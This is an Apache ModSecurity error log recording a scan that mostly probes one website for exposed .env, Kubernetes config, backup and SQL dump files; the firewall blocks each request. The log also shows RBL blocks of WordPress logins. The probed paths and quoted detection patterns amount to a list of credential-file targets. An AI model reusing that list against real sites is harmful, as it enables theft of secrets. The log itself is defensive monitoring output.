[Tue May 26 19:49:08.068532 2026] [security2:error] [pid 77894:tid 78036] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/:432/.env"] [unique_id "ahWr3DomEhVPuJoD1MaBUAAAAAw"]
[Tue May 26 19:49:08.551508 2026] [security2:error] [pid 77894:tid 78099] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/fixtures/app_types/rails/.env"] [unique_id "ahWr3DomEhVPuJoD1MaBaQAAAEs"]
[Tue May 26 19:49:09.197265 2026] [security2:error] [pid 77894:tid 78125] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/send.php.old"] [unique_id "ahWr3TomEhVPuJoD1MaBhgAAAGU"]
[Tue May 26 19:49:09.357931 2026] [security2:error] [pid 77894:tid 78081] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/error/.env"] [unique_id "ahWr3TomEhVPuJoD1MaBhwAAADk"]
[Tue May 26 19:49:09.842441 2026] [security2:error] [pid 77894:tid 78042] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.kube/config.backup"] [unique_id "ahWr3TomEhVPuJoD1MaBpQAAABI"]
[Tue May 26 19:49:10.003457 2026] [security2:error] [pid 77894:tid 78026] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db.old"] [unique_id "ahWr3jomEhVPuJoD1MaBqgAAAAI"]
[Tue May 26 19:49:10.022260 2026] [security2:error] [pid 77894:tid 78111] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr3TomEhVPuJoD1MaBlAAAAFc"]
[Tue May 26 19:49:10.652441 2026] [security2:error] [pid 77894:tid 78073] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/BE/.env"] [unique_id "ahWr3jomEhVPuJoD1MaBwQAAADE"]
[Tue May 26 19:49:10.812076 2026] [security2:error] [pid 77894:tid 78140] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/front-end/.env"] [unique_id "ahWr3jomEhVPuJoD1MaByQAAAHQ"]
[Tue May 26 19:49:11.623111 2026] [security2:error] [pid 77894:tid 78129] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/.env.old"] [unique_id "ahWr3zomEhVPuJoD1MaB3QAAAGk"]
[Tue May 26 19:49:12.681526 2026] [security2:error] [pid 77894:tid 78144] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr4DomEhVPuJoD1MaB-gAAAHg"]
[Tue May 26 19:49:13.249508 2026] [security2:error] [pid 77894:tid 78029] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/payment-app/server/.env"] [unique_id "ahWr4TomEhVPuJoD1MaCGQAAAAU"]
[Tue May 26 19:49:13.400785 2026] [security2:error] [pid 77894:tid 78122] [client 148.222.222.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr4DomEhVPuJoD1MaCFAAAAGI"]
[Tue May 26 19:49:13.896942 2026] [security2:error] [pid 77894:tid 78025] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fileweb/.env"] [unique_id "ahWr4TomEhVPuJoD1MaCLwAAAAE"]
[Tue May 26 19:49:14.220832 2026] [security2:error] [pid 77894:tid 78094] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/angular-app/.env"] [unique_id "ahWr4jomEhVPuJoD1MaCNAAAAEY"]
[Tue May 26 19:49:14.545510 2026] [security2:error] [pid 77894:tid 78057] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nestjs-app/src/.env"] [unique_id "ahWr4jomEhVPuJoD1MaCPwAAACE"]
[Tue May 26 19:49:14.675226 2026] [security2:error] [pid 77894:tid 78103] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr4jomEhVPuJoD1MaCNwAAAE8"]
[Tue May 26 19:49:15.192181 2026] [security2:error] [pid 77894:tid 78069] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend-api/.env"] [unique_id "ahWr4zomEhVPuJoD1MaCVAAAAC0"]
[Tue May 26 19:49:15.352598 2026] [security2:error] [pid 77894:tid 78075] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/api/.env"] [unique_id "ahWr4zomEhVPuJoD1MaCWAAAADM"]
[Tue May 26 19:49:15.486483 2026] [security2:error] [pid 77894:tid 78106] [client 64.233.173.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWr4jomEhVPuJoD1MaCRAAAUiQ"]
[Tue May 26 19:49:15.513702 2026] [security2:error] [pid 77894:tid 78051] [client 185.177.72.53:56142] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sHaReD/.eNv"] [unique_id "ahWr4zomEhVPuJoD1MaCZAAAABs"]
[Tue May 26 19:49:15.581857 2026] [security2:error] [pid 77894:tid 77937] [remote 148.66.130.53:51464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.130.66.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr4zomEhVPuJoD1MaCXAAAeyo"]
[Tue May 26 19:49:16.479921 2026] [security2:error] [pid 77894:tid 78050] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/test/bdd/fixtures/adapter-rest/.env"] [unique_id "ahWr5DomEhVPuJoD1MaCgwAAABo"]
[Tue May 26 19:49:17.124613 2026] [security2:error] [pid 77894:tid 78069] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vue-app/api/.env"] [unique_id "ahWr5TomEhVPuJoD1MaCmAAAAC0"]
[Tue May 26 19:49:17.191045 2026] [security2:error] [pid 77894:tid 77932] [remote 20.219.17.202:56614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr5TomEhVPuJoD1MaClAAAdSU"]
[Tue May 26 19:49:17.283844 2026] [security2:error] [pid 77894:tid 78043] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/credential/.env"] [unique_id "ahWr5TomEhVPuJoD1MaCnAAAABM"]
[Tue May 26 19:49:17.605991 2026] [security2:error] [pid 77894:tid 78082] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tailwind.config.js.bak"] [unique_id "ahWr5TomEhVPuJoD1MaCrwAAADo"]
[Tue May 26 19:49:17.896273 2026] [security2:error] [pid 77894:tid 78042] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr5TomEhVPuJoD1MaCqAAAABI"]
[Tue May 26 19:49:18.413383 2026] [security2:error] [pid 77894:tid 78040] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/about.php.bak"] [unique_id "ahWr5jomEhVPuJoD1MaCygAAABA"]
[Tue May 26 19:49:19.220613 2026] [security2:error] [pid 77894:tid 78032] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/engine/.env"] [unique_id "ahWr5zomEhVPuJoD1MaC7QAAAAg"]
[Tue May 26 19:49:19.707271 2026] [security2:error] [pid 77894:tid 77947] [remote 148.66.130.53:51464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.130.66.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr5zomEhVPuJoD1MaDAwAAHzQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:49:19.866550 2026] [security2:error] [pid 77894:tid 78100] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/squid/.env"] [unique_id "ahWr5zomEhVPuJoD1MaDBAAAAEw"]
[Tue May 26 19:49:20.453561 2026] [security2:error] [pid 77894:tid 78096] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr6DomEhVPuJoD1MaDDQAAAEg"]
[Tue May 26 19:49:20.511640 2026] [security2:error] [pid 77894:tid 78150] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fulfillment/.env"] [unique_id "ahWr6DomEhVPuJoD1MaDHwAAAH4"]
[Tue May 26 19:49:20.672073 2026] [security2:error] [pid 77894:tid 78082] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dataset1/.env"] [unique_id "ahWr6DomEhVPuJoD1MaDIwAAADo"]
[Tue May 26 19:49:20.994336 2026] [security2:error] [pid 77894:tid 78087] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env"] [unique_id "ahWr6DomEhVPuJoD1MaDNwAAAD8"]
[Tue May 26 19:49:21.317066 2026] [security2:error] [pid 77894:tid 78062] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vod_installer/.env"] [unique_id "ahWr6TomEhVPuJoD1MaDQwAAACY"]
[Tue May 26 19:49:21.482441 2026] [security2:error] [pid 77894:tid 77950] [remote 129.121.76.191:56848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr6TomEhVPuJoD1MaDQgAAETc"]
[Tue May 26 19:49:21.963637 2026] [security2:error] [pid 77894:tid 78096] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/payment/.env"] [unique_id "ahWr6TomEhVPuJoD1MaDWgAAAEg"]
[Tue May 26 19:49:22.123654 2026] [security2:error] [pid 77894:tid 78033] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hotel-app/src/.env"] [unique_id "ahWr6jomEhVPuJoD1MaDXwAAAAk"]
[Tue May 26 19:49:22.223288 2026] [security2:error] [pid 77894:tid 77949] [remote 129.121.76.191:56848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWr6jomEhVPuJoD1MaDYgAAVTY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:49:23.096072 2026] [security2:error] [pid 77894:tid 78031] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/phpinfo.php.original.bak"] [unique_id "ahWr6zomEhVPuJoD1MaDfQAAAAc"]
[Tue May 26 19:49:23.257064 2026] [security2:error] [pid 77894:tid 78151] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/data.sql"] [unique_id "ahWr6zomEhVPuJoD1MaDhAAAAH8"]
[Tue May 26 19:49:23.290608 2026] [security2:error] [pid 77894:tid 78048] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr6jomEhVPuJoD1MaDeAAAABg"]
[Tue May 26 19:49:23.849833 2026] [security2:error] [pid 77894:tid 78141] [client 172.71.172.204:9372] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blettclms.com"] [uri "/wp-admin/install.php"] [unique_id "ahWr6zomEhVPuJoD1MaDlQAAAHU"]
